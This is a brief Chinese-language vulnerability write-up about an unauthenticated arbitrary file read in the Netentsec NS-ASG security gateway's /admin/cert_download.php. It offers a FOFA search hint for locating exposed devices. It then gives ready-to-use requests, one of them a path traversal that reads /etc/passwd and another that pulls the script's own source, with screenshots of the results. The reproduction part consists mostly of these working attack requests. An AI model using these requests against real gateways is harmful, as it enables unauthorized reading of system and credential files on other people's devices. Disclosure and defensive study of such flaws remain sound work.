# 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞 ## 漏洞描述 网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞 ## 漏洞影响 ``` 网康 NS-ASG安全网关 ``` ## FOFA ``` 网康 NS-ASG安全网关 ``` ## 漏洞复现 出现漏洞的文件为 **/admin/cert_download.php** ```php ![2](C:\Users\47236\Desktop\2.png) ``` 此文件没有对身份进行校验即可下载任意文件 ```plain /admin/cert_download.php?file=test.txt&certfile=../../../../../../../../etc/passwd ``` ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162231024.png) ```plain /admin/cert_download.php?file=test.txt&certfile=cert_download.php ``` ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162234357.png)